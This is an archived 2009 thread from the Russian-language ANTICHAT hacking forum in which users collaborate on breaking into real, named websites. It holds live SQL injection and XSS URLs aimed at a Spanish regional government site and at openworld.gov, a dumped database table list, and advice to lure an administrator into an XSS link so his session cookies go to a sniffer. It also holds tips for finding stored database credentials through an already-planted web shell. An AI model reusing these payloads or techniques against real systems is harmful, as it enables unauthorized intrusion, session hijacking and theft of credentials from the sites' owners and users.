ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
13.04.2009, 10:45
|
|
Участник форума
Регистрация: 30.08.2008
Сообщений: 132
Провел на форуме:
1351948
Репутация:
325
|
|
Последний раз редактировалось Kraneg; 13.04.2009 в 10:50..
|
|
|
13.04.2009, 13:55
|
|
Постоянный
Регистрация: 14.09.2005
Сообщений: 415
Провел на форуме:
1052005
Репутация:
131
|
|
есть сайт
http://www.juntadeandalucia.es
я росканил хспайдером мне дало интиресну весч
Данная версия вебсервера Apache содержит chunked encoding уязвимость, что, помимо выведения сервера из строя, позволяет атакующему выполнить произвольный код, если сервер работает под управлением ОС FreeBSD, OpenBSD или NetBSD.
и
2 Возможно выполнение атаки межсайтовый скриптинг. Межсайтовый скриптинг (Cross site scripting или XSS) это возможность вставки HTML кода в уязвимую страницу. Инъекция кода осуществляется через все доступные способы ввода информации. Успешное завершение атаки может привести к использованию значений различных переменных, доступных в контексте сайта, записи информации, перехвату пользовательских сессий и т.д.
http://222.zone-217.12.16.juntadeandalucia.es:8081/webct/ticket/ticketLogin?action=print_login&request_uri=%22%3E% 3Cscript%3Ealert%28%27PTsecurity+Scanner+Test%27%2 9%3C%2Fscript%3E%3C%22
как можна использовать ету уязвимость еть у кого ссылки на ету инфу буду благодарен ...
я пытался вдудлить туда XSS но ничего не дало
желательно примеры ли ресурсы такие по теме а не посылать в гугл я там был и там нех нету ...
хацкеры жду помощи )
Последний раз редактировалось теща; 13.04.2009 в 15:59..
|
|
|
|
13.04.2009, 17:28
|
|
Познающий
Регистрация: 19.08.2008
Сообщений: 33
Провел на форуме:
140077
Репутация:
93
|
|
теща
sql иньеция
http://www.juntadeandalucia.es/servicioandaluzdesalud/hpm/neumologia/noticias.php?id=-2295+or+1=1--
http://www.juntadeandalucia.es/averroes/~cepja4/html/menu.3.php?codigo=092321GT54'
а так же раскрытие путей
/mnt/centr2/41/41000612/includes/database.php
нащет хсс.. подкидывай сыслку админку и его куки летят тебе на снифер
Последний раз редактировалось VITАL; 13.04.2009 в 17:34..
|
|
|
|
13.04.2009, 18:46
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541
Репутация:
5
|
|
Ребята такой вопрос! Где могут сохранятся пароли от админки cayt/admin ! В phpadmin ничего не нашел доступ из шел только в папки сайта! Где они могу прятятся пароли?
|
|
|
|
13.04.2009, 20:03
|
|
Участник форума
Регистрация: 15.08.2008
Сообщений: 167
Провел на форуме:
3009843
Репутация:
204
|
|
Сообщение от massovka
Ребята такой вопрос! Где могут сохранятся пароли от админки cayt/admin ! В phpadmin ничего не нашел доступ из шел только в папки сайта! Где они могу прятятся пароли?
Шелл есть? Есть доступ к скриптам? Посмотри, в одном из них могут храниться данные для доступа к БД. например cayt/admin/index.php
|
|
|
|
13.04.2009, 20:13
|
|
Познающий
Регистрация: 05.04.2009
Сообщений: 71
Провел на форуме:
299541
Репутация:
5
|
|
Сообщение от Shaitan-Devil
Шелл есть? Есть доступ к скриптам? Посмотри, в одном из них могут храниться данные для доступа к БД. например cayt/admin/index.php
да есть! Я вотчитал его не не могу разобратся! просто я начинающий может дам посмотришь его?
есть login.php и index.php
Последний раз редактировалось massovka; 13.04.2009 в 20:23..
|
|
|
|
13.04.2009, 20:28
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
http://www.openworld.gov/news/gallery.php?id=-1'+union+select+version()/*
Сообщение от blablabla
17 alumni
18 alumni_backup
19 alumni_link
20 alumni_old
21 archive
22 archive_file
23 archive_language
24 article
25 article_file
26 article_language
27 calendar
28 calendar_file
29 calendar_language
30 category
31 category_language
32 change_log
33 change_page
34 city
35 city_file
36 city_language
37 comment
38 comment_file
39 comment_language
40 contact
41 contact_access
42 contact_contactgroup
43 contact_language
44 contactgroup
45 contactgroup_language
46 country
47 country_language
48 delegation_file
49 enter_ip
50 faq
51 faq_file
52 faq_language
53 file
54 file_language
55 grantee
56 grantee_city
57 grantee_language
58 group
59 group_file
60 language
61 news
62 news_file
63 news_language
64 organization
65 organization_language
66 ow_theme
67 ow_theme_name
68 partnerbanner
69 phpbb_attach_quota
70 phpbb_attachments
71 phpbb_attachments_config
72 phpbb_attachments_desc
73 phpbb_auth_access
74 phpbb_banlist
75 phpbb_categories
76 phpbb_config
77 phpbb_confirm
78 phpbb_disallow
79 phpbb_extension_groups
80 phpbb_extensions
81 phpbb_forbidden_extensions
82 phpbb_forum_prune
83 phpbb_forums
84 phpbb_groups
85 phpbb_posts
86 phpbb_posts_deleted
87 phpbb_posts_text
88 phpbb_posts_text_deleted
89 phpbb_privmsgs
90 phpbb_privmsgs_text
91 phpbb_quota_limits
92 phpbb_ranks
93 phpbb_search_results
94 phpbb_search_wordlist
95 phpbb_search_wordmatch
96 phpbb_sessions
97 phpbb_sessions_keys
98 phpbb_smilies
99 phpbb_themes
100 phpbb_themes_name
101 phpbb_topics
102 phpbb_topics_watch
103 phpbb_user_group
104 phpbb_users
105 phpbb_users_deleted
106 phpbb_vote_desc
107 phpbb_vote_results
108 phpbb_vote_voters
109 phpbb_words
110 position_code
111 position_code_language
112 position_group
113 position_group_language
114 press
115 press_file
116 press_language
117 pub_gallery
118 pub_gallery_delegation
119 pub_gallery_file
120 pub_language
121 publisher
122 publisher_logo
123 publisher_name
124 section
125 section_backup
126 section_file
127 section_language
128 state
129 state_language
130 subscribers
131 supporter
132 supporter_language
133 sys_group
134 sys_language
135 sys_user
136 sys_user_group
137 snauthys_user_name
138 sys_user_u
139 translation
http://www.openworld.gov/phpMyAdmin/
phpMyAdmin есть но нет таблицы с юзерами.......как я понял я нервно курю в сторонке, т.к мне прав не хватает прочитать таблицы phpMyAdmin'а?
Последний раз редактировалось +++AndreyDevil+++; 13.04.2009 в 20:34..
|
|
|
|
13.04.2009, 20:39
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
104 phpbb_users - таблица с юзверями...
Андрей будь внимательней...
|
|
|
|
13.04.2009, 20:44
|
|
Участник форума
Регистрация: 28.12.2008
Сообщений: 136
Провел на форуме:
1311435
Репутация:
90
|
|
Может я слепой, но почему то форума там не наблюдаю (!)...
|
|
|
|
13.04.2009, 21:00
|
|
Участник форума
Регистрация: 14.11.2008
Сообщений: 149
Провел на форуме:
950638
Репутация:
256
|
|
Сообщение от +++AndreyDevil+++
Может я слепой, но почему то форума там не наблюдаю (!)...
В таком случае встречный вопрос, таблицу с юзерами от чего ты ищешь, реги так сказать я там тоже не наблюдаю... хотя если только на поддомене: dd.openworld.gov жаль акка нет, регаться влом... насчет форума точно сказать не могу... скорее всего был когда то а таблицы не снесли...
Последний раз редактировалось DrAssault; 13.04.2009 в 22:10..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
